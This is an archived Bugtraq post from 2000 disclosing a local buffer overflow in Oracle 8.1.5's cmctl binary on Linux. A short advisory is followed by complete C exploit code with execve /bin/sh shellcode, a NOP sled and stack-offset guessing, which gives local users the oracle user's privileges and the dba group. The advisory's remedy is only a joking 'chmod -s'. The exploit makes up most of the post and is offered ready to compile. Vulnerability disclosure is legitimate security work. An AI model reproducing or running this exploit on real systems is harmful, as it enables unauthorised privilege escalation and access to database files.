[17702] in bugtraq

home help back first fref pref prev next nref lref last post

vulnerability in Connection Manager Control binary in Oracle

daemon@ATHENA.MIT.EDU (Juan Manuel Pascual Escriba)
Mon Nov 20 13:35:28 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-Id:  <3A1911B6.2A314D11@plazasite.com>
Date:         Mon, 20 Nov 2000 12:57:42 +0100
Reply-To: pask@PLAZASITE.COM
From: Juan Manuel Pascual Escriba <pask@PLAZASITE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Hello Elias


        Colud you make public this advisory. Oracle people dont send an
answer in 6 days. Please cut this lines.


                                                                Thanks




                      WWW.PLAZASITE.COM
                  System & Security Division

   Title:     Vulnerability in cmctl in Oracle 8.1.5
    Date:     13-11-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any user gain euid=oracle & egid=dba.
  Author:     Juan Manuel Pascual (pask@plazasite.com)
  Status:     Vendor Contacted. Details Below


OVERVIEW:

    cmctl is a Connection Manager Control binary


PROBLEM SUMMARY:

    There is a buffer overflow in cmctl that can be use by local
users to obtain euid of oracle user and egid to dba. With the default
instalation oracle user owns all database files.


IMPACT:

    Any user with local access, can gain euid= oracle an egid=dba


SOLUTION:

    Maybe a chmod -s ;-)))).


STATUS:

    Vendor was contacted 13/1.1 No answers were received in last
4 days.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@plazasite.com



/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH
6.2
and 6.1. Is possible to export to others platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact:   any user gain euid=oracle and egid=dba.


Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/


#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl
echo $pakito"


char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;


  if (argc > 1) offset  = atoi(argv[1]);
        else
                {
                printf("Use ./cmctl_start Offset\n");
                exit(1);
                }


  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
setenv("pakito",buff,1);

system(BINARY);
}

--


                " In God We trust, Others We monitor "

        -------------------------------------------------------------
         Juan Manuel Pascual Escriba        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomas Bretsn 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask@plazasite.com
        -------------------------------------------------------------

home help back first fref pref prev next nref lref last post